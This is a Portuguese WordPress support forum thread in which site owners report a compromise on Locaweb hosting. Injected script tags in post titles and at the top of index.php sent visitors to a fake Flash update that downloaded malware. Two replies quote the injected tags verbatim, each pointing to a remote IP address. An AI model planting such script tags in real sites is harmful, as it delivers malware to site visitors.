Suporte » Temas » Falha de segurança permite inserir script de vírus em título de post

  • Resolvido robfbms

    (@robfbms)


    Venho alertar que há uma falha de segurança grave que permite que um invasor edite posts no blog inserindo script que redireciona ao download de vírus no título. Não há qualquer proteção contra inserção de scripts em títulos de posts, o que torna o blog vulnerável a transmitir vírus.

    Peço que, por favor, corrijam este bug na próxima versão do WordPress.

Visualizando 9 respostas - 1 até 9 (de um total de 9)
  • Eduardo

    (@eduardozulian)

    Em que versão e em qual tema esse erro aconteceu?

    Criador do tópico robfbms

    (@robfbms)

    WordPress 3.5.1, template Platform 1.4.3

    Eduardo

    (@eduardozulian)

    Mas o que aconteceu foi um script no título dos posts?

    Criador do tópico robfbms

    (@robfbms)

    Foi isso mesmo. Um script que redirecionava o blog a uma falsa página de atualização do Flash e fazia download automático de um vírus ou malware.

    este probleme comigo e constante, ja troquei senhas e esta tudo atualizado mas continua o problema. estranhamente só acontece na locaweb, na hostgator não.

    Tenho uma revenda na locaweb também tenho estes problema em vários sites, geralmente este script malicioso fica no arquivo index.php logo a primeira linha de código, basta apagar que o problema sera resolvido temporariamente veja um exemplo do código malicioso <script src=”http://63.78.213.207/br/flashplayer/download/”></script&gt;

    Bom ainda não sei como pode ser resolvido este problema em definitivo, espero encontrar a solução aqui.

    abraço a todos

    Acabei de ter o mesmo problema.
    Só que o código inserido foi esse daqui:
    <script src=”http://209.16.101.230/br/flashplayer/”></script&gt;

    Exatamente na index.php, na pirmeira linha

    Fiz várias ações no site e não resolveu.
    peguei o IP 209.16.101.230 e bloquiei no painel do servidor.

    Vamos ver se não volta.

    Vcs deveriam talvez entrar em contato com a Locaweb, já que aparentemente todos estão tendo o problema nos servidores deles.

    Certifiquem de que os plugins e o próprio de WP esteja devidamente atualizados para ficarem em dia com os patchs de segurança.

    Eu também já vi uma cliente entrar na lista negra por encherem o site dela de scripts maliciosos, e curiosamente isso também aconteceu na locaweb.

Visualizando 9 respostas - 1 até 9 (de um total de 9)
  • O tópico ‘Falha de segurança permite inserir script de vírus em título de post’ está fechado para novas respostas.